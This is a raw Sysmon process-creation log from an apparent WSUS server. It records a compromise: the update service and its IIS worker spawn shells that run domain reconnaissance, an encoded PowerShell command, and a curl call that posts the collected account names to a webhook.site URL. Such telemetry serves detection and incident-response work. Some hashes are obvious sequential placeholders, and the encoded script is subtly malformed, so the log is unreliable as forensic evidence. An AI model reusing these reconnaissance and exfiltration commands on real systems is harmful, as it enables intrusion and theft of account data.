154100x80000000000000002345542Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:34:12.551{A10B94A8-FA11-814A-3705-00000000C001}8404C:\Windows\System32\cmd.exe10.0.17763.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Program Files\Update Services\WebServices\NT AUTHORITY\SYSTEM{A10B94A8-A38E-814A-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A10B94A8-A45C-814A-3701-00000000C001}3268C:\Program Files\Update Services\Services\wsusservice.exe"C:\Program Files\Update Services\Services\wsusservice.exe" 154100x80000000000000002345543Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:34:12.753{A10B94A8-FA18-814A-4206-00000000C001}8612C:\Windows\System32\cmd.exe10.0.17763.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "whoami;net user /domain; ipconfig /all"C:\Program Files\Update Services\WebServices\NT AUTHORITY\SYSTEM{A10B94A8-A38E-814A-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A10B94A8-FA11-814A-3705-00000000C001}8404C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe 154100x80000000000000002345544Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:34:13.154{A10B94A8-FA2F-814A-4C05-00000000C001}9144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ec JAByAD0AIAAoACYAewBlAGMAaABvACAAaAB0AHQAcABzADoALwAvAHcAcwB1AHMALQBzAHIAdgAtADAAMQAuAGMAbwBuAHQAbwBzAG8ALgBsAG8AYwBhAGwAOgA4ADUAMwAxADsAIABuAGUAdAAgAHUAcwBlAHIAIAAvAGQAbwBtAGEAaQBuADsAIABpAHAAYwBvAG4AZgBpAGcAIAAvAGEAbABsAH0AIAB8AG8AdQB0AC0AcwB0AHIAaQBuAGcAKQArACAAJABFAHIAcgBvAHIAIAA7ACQADQA9ACIAaAB0AHQAcAA6AC8ALwB3AGUAYgBoAG8AbwBrAC4AcwBpAHQAZQAvADEAMgAzADQANQA2ADcAOAAiADsAdAByAHkAewBpAHcAcgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJAB3ACAALQBCAG8AZAB5ACAAJAByACAALQBNAGUAdABoAG8AZAAgAFAAdQB0AH0AYwBhAHQAYwBoAHsAYwB1AHIAbAAuAGUAeABlACAALQBrACAAJAB3ACAAJAAMAA0ALQBkAGEAdABhAC0AYgBpAG4AYQByAHkAIAAkAHIAfQA=C:\Program Files\Update Services\WebServices\NT AUTHORITY\SYSTEM{A10B94A8-A38E-814A-E703-000000000000}0x3e70SystemMD5=04029E121A0CFA5991749937DD22A1D9,SHA256=A8FDBA9DF15E41B6F5C69C79F66A26A9D48E174F9E7018A371600B866867DAD8,IMPHASH=F2A5A5A4C57DEFD99B6B8F4C6F6F0B6C{A10B94A8-FA18-814A-4206-00000000C001}8612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "whoami;net user /domain; ipconfig /all" 154100x80000000000000002345545Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:34:18.821{A10B94A8-FA55-814A-5D06-00000000C001}9872C:\Windows\System32\curl.exe7.83.1.0curl command line toolThe curl executablecurl, https://curl.se/curl.execurl.exe -k http://webhook.site/12345678 --data-binary "nt authority\system contoso\admin1 contoso\admin2"C:\Program Files\Update Services\WebServices\NT AUTHORITY\SYSTEM{A10B94A8-A38E-814A-E703-000000000000}0x3e70SystemMD5=88AB26F1C12D45F24D7A5DFC22AA9CB5,SHA256=E4A4B3C5D6A7F8E9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3,IMPHASH=0D09A8F7C6E5B4D3A2C1B0A9D8E7F6C5{A10B94A8-FA2F-814A-4C05-00000000C001}9144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ec JAByAD0AIAAoACYAewBlAGMAaABvACAAaAB0AHQAcABzADoALwAvAHcAcwB1AHMALQBzAHIAdgAtADAAMQAuAGMAbwBuAHQAbwBzAG8ALgBsAG8AYwBhAGwAOgA4ADUAMwAxADsAIABuAGUAdAAgAHUAcwBlAHIAIAAvAGQAbwBtAGEAaQBuADsAIABpAHAAYwBvAG4AZgBpAGcAIAAvAGEAbABsAH0AIAB8AG8AdQB0AC0AcwB0AHIAaQBuAGcAKQArACAAJABFAHIAcgBvAHIAIAA7ACQADQA9ACIAaAB0AHQAcAA6AC8ALwB3AGUAYgBoAG8AbwBrAC4AcwBpAHQAZQAvADEAMgAzADQANQA2ADcAOAAiADsAdAByAHkAewBpAHcAcgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJAB3ACAALQBCAG8AZAB5ACAAJAByACAALQBNAGUAdABoAG8AZAAgAFAAdQB0AH0AYwBhAHQAYwBoAHsAYwB1AHIAbAAuAGUAeABlACAALQBrACAAJAB3ACAAJAAMAA0ALQBkAGEAdABhAC0AYgBpAG4AYQByAHkAIAAkAHIAfQA= 154100x80000000000000002345546Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:35:45.125{A10B94A8-FB11-814A-7E08-00000000C001}10256C:\Windows\System32\cmd.exe10.0.17763.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Windows\System32\inetsrv\NT AUTHORITY\NETWORK SERVICE{A10B94A8-A391-814A-E714-000000000000}0x14e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A10B94A8-A47E-814A-4802-00000000C001}4512C:\Windows\System32\inetsrv\w3wp.exec:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm8530-wsus -h "C:\inetpub\temp\apppools\WsusPool\WsusPool.config" -w "" -m 0 154100x80000000000000002345547Microsoft-Windows-Sysmon/Operationalwsus-srv-01.contoso.local-2025-10-23 23:35:45.890{A10B94A8-FB23-814A-8F09-00000000C001}10788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17763.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -Command "net group 'Domain Admins' /domain; Get-WmiObject -Class Win32_ComputerSystem"C:\Windows\System32\inetsrv\NT AUTHORITY\NETWORK SERVICE{A10B94A8-A391-814A-E714-000000000000}0x14e70SystemMD5=04029E121A0CFA5991749937DD22A1D9,SHA256=A8FDBA9DF15E41B6F5C69C79F66A26A9D48E174F9E7018A371600B866867DAD8,IMPHASH=F2A5A5A4C57DEFD99B6B8F4C6F6F0B6C{A10B94A8-FB11-814A-7E08-00000000C001}10256C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe